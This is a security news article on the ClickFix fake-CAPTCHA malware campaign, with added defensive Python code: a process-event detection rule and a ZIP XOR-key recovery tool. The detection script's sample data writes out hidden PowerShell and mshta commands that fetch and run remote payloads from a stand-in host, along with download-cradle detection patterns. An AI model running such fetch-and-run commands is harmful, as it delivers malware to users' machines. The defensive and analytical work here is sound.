
Fake Captcha Scam: How Hackers Trick Users into Downloading Malware
ClickFix Captcha presents itself as an innocuous verification test, but cybercriminals use the tactic to get unsuspecting users to run malware on their own machines.
In a rush? Here are the quick facts:
- Hackers use fake ClickFix CAPTCHA pages to trick users into running malicious commands themselves.
- The QakBot trojan is being delivered through fake CAPTCHAs and hidden PowerShell scripts.
- The downloaded payload is XOR-encoded and only decoded at runtime, which helps it evade detection.
This distribution method has been linked to ransomware delivery, the QakBot banking trojan and infostealers. QakBot, first seen in 2008, has since evolved into a sophisticated piece of malware, the researchers say.
Security researchers at DarkAtlas Research Squad discovered a new campaign that tricked users into thinking they were completing a routine CAPTCHA check while they were in fact running commands on their own computers.
The ClickFix page instructed users to press Windows Key + R, which opens the Run dialog, and then paste and run a command the page had already placed in their clipboard. That command quietly downloaded an encrypted file from a remote server and executed malicious code, with nothing on screen to raise suspicion. Nothing in this chain exploits a browser bug: the page only writes to the clipboard and relies on the user to paste and press Enter.
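The execution chain above leaves a distinctive trace in process telemetry: the Run dialog runs under explorer.exe, so a hidden PowerShell (or mshta, cmd, curl) spawned by explorer.exe with a download cradle in its command line is the thing to hunt for. The Python script below is an added example, not DarkAtlas's code or anything from the article; it runs a simple scoring rule over a handful of constructed Sysmon-style process-creation events (the domains, paths and command lines are made up for illustration). On a suspected host, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a complementary artefact worth pulling.

```python
import re
from typing import Dict, List, Tuple

# Binaries a ClickFix command typically lands in when launched from the Run dialog.
LOLBINS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe",
    "certutil.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe",
}

# (label, regex) pairs matched against the command line. Each one alone is noisy;
# the rule below requires two, or a LOLBin pulling remote content directly.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("remote-url", re.compile(r"https?://", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded-command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download-cradle", re.compile(
        r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|invoke-expression|iex)\b", re.I)),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("mshta-remote", re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I)),
]

# Constructed sample events in a simplified Sysmon Event ID 1 shape (hypothetical values).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # ClickFix pattern: Run dialog -> hidden PowerShell that fetches and runs a ZIP
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -nop -c "iwr http://example.invalid/chk -OutFile $env:TEMP\chk.zip; '
                       r'Expand-Archive $env:TEMP\chk.zip $env:TEMP\chk; & $env:TEMP\chk\run.ps1"',
    },
    {   # Benign: a user opening an interactive PowerShell from the Start menu
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
    {   # Benign: a scheduled task running a local script (parent is not explorer.exe)
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {   # ClickFix variant: mshta pulling a remote HTA straight from the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://example.invalid/verify",
    },
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the indicator labels that fire for one event, or [] if the
    parent/child pair is not the Run-dialog-to-LOLBin shape we care about."""
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(ev.get("Image", "")) not in LOLBINS:
        return []
    cmd = ev.get("CommandLine", "")
    return [label for label, rx in INDICATORS if rx.search(cmd)]


def is_clickfix_like(ev: Dict[str, str]) -> bool:
    """Flag on two independent indicators, or on any LOLBin fetching remote content."""
    hits = score_event(ev)
    return len(hits) >= 2 or "mshta-remote" in hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (index, indicators) for every event that looks like ClickFix execution."""
    return [(i, score_event(ev)) for i, ev in enumerate(events) if is_clickfix_like(ev)]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

The parent-process check is what keeps this rule quiet: PowerShell with a download cradle is common in administration, but it is rarely launched from explorer.exe with a hidden window. Tune the indicator list to your own baseline before deploying it.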
DarkAtlas also found that the payload was XOR-encoded and decoded only at runtime, which hides its real purpose from static scanning and makes detection harder. The attackers registered fake domains to host ZIP files containing the malicious payloads.
Once downloaded, the archives were extracted and their scripts executed, designed to steal sensitive information or deploy ransomware. Worryingly, the attackers could generate an unlimited number of unique download URLs, so blocklisting individual URLs is largely ineffective; defenders are better served by keying on the execution behaviour and the payload itself than on disposable indicators.
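Because the download URLs are disposable, analysing the payload is more durable than blocklisting. If the XOR key repeats, as it does in the simplest loaders, the fact that every ZIP begins with the local file header signature PK\x03\x04 gives four bytes of known plaintext, enough to recover a key of up to four bytes and to verify the guess by parsing the result. The Python below is an added example, not the malware's decoder or the researchers' tooling; the sample blob is constructed inside the script (a tiny ZIP holding a harmless stub, encoded with an assumed three-byte key), and the key-recovery step assumes a repeating key no longer than the known header, which the article does not specify.

```python
import io
import zipfile
from itertools import cycle
from typing import List, Optional, Tuple

ZIP_MAGIC = b"PK\x03\x04"  # local file header signature that opens every ZIP


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; encoding and decoding are the same operation."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(blob: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Recover a repeating key of key_len bytes from a blob whose plaintext is
    known to start with known_prefix (known-plaintext attack on XOR).
    Needs key_len <= len(known_prefix)."""
    if key_len > len(known_prefix) or key_len > len(blob):
        raise ValueError("need at least key_len bytes of known plaintext and ciphertext")
    return bytes(blob[i] ^ known_prefix[i] for i in range(key_len))


def decode_zip_payload(blob: bytes, max_key_len: int = 4) -> Optional[Tuple[bytes, bytes]]:
    """Try key lengths 1..max_key_len using the ZIP magic as known plaintext.
    Returns (key, decoded) for the first candidate that parses as a valid ZIP, else None."""
    for key_len in range(1, max_key_len + 1):
        key = recover_key(blob, ZIP_MAGIC, key_len)
        decoded = xor_bytes(blob, key)
        # A wrong key length breaks the magic beyond byte key_len-1, so this is a cheap filter.
        if not decoded.startswith(ZIP_MAGIC):
            continue
        try:
            with zipfile.ZipFile(io.BytesIO(decoded)) as zf:
                if zf.testzip() is None:  # CRCs of every member check out
                    return key, decoded
        except zipfile.BadZipFile:
            continue
    return None


def payload_names(decoded: bytes) -> List[str]:
    """Member names inside a decoded ZIP, for triage without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(decoded)) as zf:
        return zf.namelist()


def build_sample(key: bytes) -> bytes:
    """Constructed sample: a tiny ZIP holding a harmless stub, XOR-encoded with key.
    Stands in for the archive a ClickFix command would fetch; not a real payload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("stage2.ps1", "Write-Host 'sample only'\n")
    return xor_bytes(buf.getvalue(), key)


if __name__ == "__main__":
    sample_key = b"\x5a\xa5\x3c"  # assumed key for the constructed sample
    blob = build_sample(sample_key)
    result = decode_zip_payload(blob)
    if result is None:
        print("no repeating key of length <= 4 found")
    else:
        key, decoded = result
        print(f"recovered key {key.hex()}, members: {payload_names(decoded)}")
```

For a key longer than the signature, extend the known plaintext with the other predictable local header fields (version and flag bytes follow the magic) or fall back to frequency analysis on the ciphertext; the verification step, parsing the result as a ZIP and checking member CRCs, stays the same.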
This attack fits the pattern described in Gen's Q3/2024 threat report, which shows a dramatic increase in "Scam-Yourself Attacks" that deceive users into installing malware themselves. The attackers combine ClickFix scams with fake CAPTCHA prompts and deceptive tutorials to gain control of victims' machines.
According to the report, AI and deepfake technology have made these scams harder to spot. Users can stay protected from such evolving threats with the help of Norton Genie.
The researchers advise users to remain vigilant and never paste or run commands that a website asks them to execute, however routine the request looks.